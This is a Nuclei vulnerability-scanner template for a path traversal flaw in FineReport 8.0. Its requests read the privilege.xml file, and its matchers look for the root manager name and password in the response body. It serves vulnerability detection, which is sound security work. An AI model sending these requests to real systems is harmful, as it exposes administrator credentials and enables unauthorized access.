nuclei-templates/vulnerabilities/other/finereport-path-traversal.yaml

28 lines
655 B
YAML
Raw Normal View History

2021-02-20 16:36:48 +00:00
id: finereport-path-traversal
info:
name: Finereport 8.0 Path Traversal
author: pikpikcu
severity: medium
refrence: http://foreversong.cn/archives/1378
tags: finereport,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml"
- "{{BaseURL}}/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml"
matchers-condition: and
matchers:
- type: word
words:
- "<rootManagerName>"
- "<rootManagerPassword>"
part: body
2021-02-20 17:11:54 +00:00
condition: and
2021-02-20 16:36:48 +00:00
- type: status
status:
- 200